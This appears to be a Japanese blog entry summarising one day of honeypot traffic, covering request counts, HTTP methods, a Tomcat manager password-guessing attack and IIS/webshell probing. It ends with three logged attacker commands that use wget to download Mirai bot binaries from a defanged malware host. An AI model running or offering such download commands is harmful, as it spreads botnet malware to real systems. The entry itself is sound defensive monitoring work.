honeypotの簡易解析7日目

2019-04-07のアクセス数は658件でした。

■送信元IPアドレスの数は 39件です。

■メソッドの種別は以下です。

GET・・516件 PUT・・0件 POST・・141件 HEAD・・0件 CONNECT・・0件 PROFFIND・・1件 その他・・0件

気になるlog

2IPより大量アクセス

1つめはパスワードアタックでした。7分間で280回。tomcatの管理画面に対するアクセスです。

2つめは、様々な攻撃でした。こっちはIISの脆弱性とphpwebshellの調査、tomcatの管理画面へのパスワードアッタクがありました。こちらは4分間に316件です。

miraiのダウンロード

以前より観測しているmiraiのダウンロードが今日もあった。

[2019-04-07 09:11:36+0900] 178.70.69.92 wget http[:]//love.thotiana[.]live/bins/x86.bot

[2019-04-07 14:35:39+0900] 41.83.206.243 wget+http[:]//love.thotiana[.]live/bins/mpsl.bot

[2019-04-07 15:25:17+0900] 157.230.22.247 wget+http[:]//love.thotiana[.]live/bins/mpsl.bot